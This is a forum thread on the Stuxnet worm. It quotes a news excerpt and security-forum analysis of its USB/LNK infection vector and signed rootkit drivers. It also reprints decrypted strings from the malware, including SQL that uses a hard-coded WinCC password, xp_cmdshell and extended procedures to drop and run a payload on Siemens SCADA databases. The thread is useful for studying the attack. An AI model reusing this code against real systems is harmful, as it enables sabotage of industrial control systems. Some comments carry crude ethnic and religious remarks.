Posted on 09/30/2010 11:59:40 AM PDT by JoeProBono
Deep inside the computer worm that some specialists suspect is aimed at slowing Iran’s race for a nuclear weapon lies what could be a fleeting reference to the Book of Esther, the Old Testament tale in which the Jews pre-empt a Persian plot to destroy them. That use of the word “Myrtus” — which can be read as an allusion to Esther — to name a file inside the code is one of several murky clues that have emerged as computer experts try to trace the origin and purpose of the rogue Stuxnet program, which seeks out a specific kind of command module for industrial equipment.
Not surprisingly, the Israelis are not saying whether Stuxnet has any connection to the secretive cyberwar unit it has built inside Israel’s intelligence service. Nor is the Obama administration,
(Excerpt) Read more at nytimes.com ...
Ooo -Kay
Also an allusion to the story of Esther.
People who try to wipe out the Jews do not fare well.
Not your fault, but this is like the fourth time today this thread has been started. Just so ya know.
People working overtime to blame Israel, eh?
One of God’s angels is a Hacker?
Blame? Praise is a more appropriate word.
Exactly.
The day of Purim that is celebrated on the Jewish calender was the day Haman and his 10 sons were hanged. It just so happens that on the same day in 1946 Hitler’s 10 closest officers were hanged after the Nuremberg trials had concluded.
I thought they had established that the only folks with access to the affected computers were Russian.
India and Indonesia were affected by this worm as well, btw.
SCADA System’s Hard-Coded Password Circulated Online for Years
And let's include something from Wilders Security Forum:Rootkit.TmpHider
**************************************Excerpts************************************
July 12th, 2010, 09:18 AM
sergey ulasen
Modules of current malware were first time detected by "VirusBlokAda" (http://anti-virus.by/en/) company specialists on the 17th of June, 2010 and were added to the anti-virus bases as Trojan-Spy.0485 and Malware-Cryptor.Win32.Inject.gen.2. During the analysis of malware there was revealed that it uses USB storage device for propagation.
You should take into consideration that virus infects Operation System in unusual way through vulnerability in processing lnk-files (without usage of autorun.inf file).
So you just have to open infected USB storage device using Microsoft Explorer or any other file manager which can display icons (for i.e. Total Commander) to infect your Operating System and allow execution of the malware.
Malware installs two drivers: mrxnet.sys and mrxcls.sys. They are used to inject code into systems processes and hide malware itself. That's the reason why you can't see malware files on the infected USB storage device. We have added those drivers to anti-virus bases as Rootkit.TmpHider and SScope.Rookit.TmpHider.2. Note that both drivers are signed with digital signature of Realtek Semiconductor Corp. (www.realtek.com).
Thus, current malware should be added to very dangerous category causes the risk of the virus epidemic at the current moment.
After we have added a new recordes to the anti-virus bases we are admitting a lot of detections of Rootkit.TmpHider and SScope.Rookit.TmpHider.2 all over the world.
Source: http://anti-virus.by/en/tempo.shtml
**************************************************************snip************************************************
Now to a later post :
AV Expert
***************************EXCERPT*****************************
hi guys,
has anyone already taken a deeper look at the malware?
i found stuff like this after some decryption/unpacking stages of MD5 sample 016169ebebf1cec2aad6c7f0d0ee9026
**********************
SOFTWARE\Microsoft\MSSQLServer pdl GracS\ 2WSXcder WinCCConnect master .\WinCC sqloledb GracS\cc_tlg7.sav Step7\Example use [%s] declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where id=object_id(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';exec sp_msforeachdb @z'')' exec (@t) declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where id=object_id(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid set @e=charindex('--CC-SP',@t) if @e=0 begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from fail_in_order_to_return_false set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;exec master..sp_dropextendedproc sp_payload;break; end fetch next from r into @t end close r deallocate r --*' exec (@t) use master select name from master..sysdatabases where filename like N'%s' exec master..sp_attach_db 'wincc_svr',N'%s',N'%s' exec master..sp_detach_db 'wincc_svr' use wincc_svr or SOFTWARE\SIEMENS\WinCC\Setup STEP7_Version SOFTWARE\SIEMENS\STEP7 SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation NTVDM TRACE .MCP .zip ~DT %s\WINCC DECLARE @vr varchar(256) SET @vr = CONVERT(varchar(256), (SELECT serverproperty('productversion') )) IF @vr > '9' BEGIN EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVERRIDE EXEC sp_configure 'Ole Automation Procedures', 1 RECONFIGURE WITH OVERRIDE END DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @aods int, @adss int, @aip int, @abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @aods, 'Type', 1 IF @hr <> 0 GOTO endq EXEC @hr = sp_OAMethod @aods, 'Open', null IF @hr <> 0 GOTO endq SET @adss = ( SELECT DATALENGTH(abin) FROM sysbinlog ) SET @aip = 1 WHILE ( @aip <= @adss ) BEGIN SET @abf = ( SELECT SUBSTRING (abin, @aip, 4096 ) FROM sysbinlog ) EXEC @hr = sp_OAMethod @aods, 'Write', null, @abf IF @hr <> 0 GOTO endq SET @aip = @aip + 4096 END EXEC @hr = sp_OAMethod @aods, 'SaveToFile', null, @ainf, 2 IF @hr <> 0 GOTO endq EXEC sp_OAMethod @aods, 'Close', null endq: EXEC sp_dropextendedproc sp_dumpdbilog DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' EXEC sp_addextendedproc sp_dumpdbilog, @ainf EXEC sp_dumpdbilog EXEC sp_dropextendedproc sp_dumpdbilog endq: DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @fs int EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fs OUT IF @hr <> 0 GOTO endq EXECUTE sp_OAMethod @fs, 'DeleteFile', NULL, @ainf endq: DROP TABLE sysbinlog 0123456789ABCDEF CREATE TABLE sysbinlog ( abin image ) INSERT INTO sysbinlog VALUES(0x %SystemRoot%\system32\netapi32.dll %SystemRoot%\system32\kernel32.dll .xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_run,@t);exec master..sp_run;') view MCPVREADVARPERCON as select MCPTVARIABLEDESC.VARIABLEID,MCPTVARIABLEDESC.VARIABLETYPEID,MCPTVARIABLEDESC.FORMATFITTING,MCPTVARIABLEDESC.SCALEID,MCPTVARIABLEDESC.VARIABLENAME,MCPTVARIABLEDESC.ADDRESSPARAMETER,MCPTVARIABLEDESC.PROTOKOLL,MCPTVARIABLEDESC.MAXLIMIT,MCPTVARIABLEDESC.MINLIMIT,MCPTVARIABLEDESC.STARTVALUE,MCPTVARIABLEDESC.SUBSTVALUE,MCPTVARIABLEDESC.VARFLAGS,MCPTVARIABLEDESC.CONNECTIONID,MCPTVARIABLEDESC.VARPROPERTY,MCPTVARIABLEDESC.CYCLETIMEID,MCPTVARIABLEDESC.LASTCHANGE,MCPTVARIABLEDESC.ASDATASIZE,MCPTVARIABLEDESC.OSDATASIZE,MCPTVARIABLEDESC.VARGROUPID,MCPTVARIABLEDESC.VARXRES,MCPTVARIABLEDESC.VARMARK,MCPTVARIABLEDESC.SCALETYPE,MCPTVARIABLEDESC.SCALEPARAM1,MCPTVARIABLEDESC.SCALEPARAM2,MCPTVARIABLEDESC.SCALEPARAM3,MCPTVARIABLEDESC.SCALEPARAM4 from MCPTVARIABLEDESC ((SELECT top 1 1 FROM MCPVREADVARPERCON)='1') --CC-SP 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''--CC-S''''+char(80);if left(db_name(),2)=''''CC'''' select @t=substring(text,charindex(@s,text)+8,charindex(''''--*'''',text)-charindex(@s,text)-8) from syscomments where text like (''''%''''+@s+''''%'''');if @t is not NULL exec(@t)'';exec sp_msforeachdb @z')
*****************************************
this points me to the Siemens WinCC SCADA system. looks like this malware was made for espionage.
http://www.wilderssecurity.com/showpost.php?p=1712713&postcount=26
********************************EXCERPT************************************
Re: Rootkit.TmpHider
Is this vulnerability present in all Windows Operating Systems? I cannot get shortcut links to run automatically from a USB drive in Win2K or WinXP.
******************************EXCERPT*****************************
Re: Rootkit.TmpHider
|
Originally Posted by Rmus
Is this vulnerability present in all Windows Operating Systems? I cannot get shortcut links to run automatically from a USB drive in Win2K or WinXP.
|
Thank you for that historical tidbit. Ironic. May the same fate befall anyone else who seeks to annihilate the Jews or commit any sort of genocide.
NY Times has a vested interest in blaming the Joooos....
LOL
********************************EXCERPT*************************************
Rootkit-TmpHider - USB infector without usage of Autorun.inf
»anti-virus.by/en/tempo.shtml
Also they are talking about this at Wilders in some depth.
»www.wilderssecurity.com/showthre···t=276994
This malware appears to be exploiting an unpatched vulnerability in processing LNK files.
It looks like this malware could infect even if you have 'Autorun' disabled on your computer. Simply accessing the infected USB device with Windows Explorer or another file manager could execute this malware.
What’s so funny? I must be missing something in the text you put in bold.
use of the word "Myrtus" -- which can be read as an allusion to Esther -- to name a file inside the code is one of several murky cluesTurn me on, dead man. ;')
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.